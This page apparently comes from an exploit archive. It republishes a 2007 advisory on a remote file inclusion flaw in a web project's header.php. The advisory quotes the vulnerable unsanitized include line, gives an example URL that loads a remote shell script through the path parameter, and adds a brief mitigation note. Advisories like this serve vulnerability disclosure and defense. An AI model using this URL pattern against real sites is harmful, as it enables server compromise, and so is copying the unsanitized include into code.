workbench survival guide - exploit.company

vendor:

by:

kezzap66345@hotmail.com

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

workbench survival guide <= Remote File Inclusion Vulnerability

The vulnerability exists in the header.php file of the workbench survival guide. The include function is used to include the navbar.php file without proper sanitization, allowing an attacker to remotely include arbitrary files. An example exploit URL is provided as http://site.com/path/header.php?path=[[Sh3LL Script]].

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize user input before including files.

Source

Exploit-DB raw data:

##############################################################################################
##############################################################################################
#workbench survival guide <=  Remote File Inclusion Vulnerability
#
#Coder:kezzap66345@hotmail.com
#
#Vuln Code
###################################################################################
#
#ERROR:header.php
#
#<td width="100" bgcolor="#9999cc"><?include("$path/navbar.php")?></td>
#
#BUG:
#
#Example:http://site.com/path/header.php?path=[[Sh3LL Script]]
#
#Script Download
#############################################################################
#http://sourceforge.net/projects/workbench/
#
#Original W3b
Site############################################################################
#
#http://workbench.sourceforge.net
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
#####################################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-04]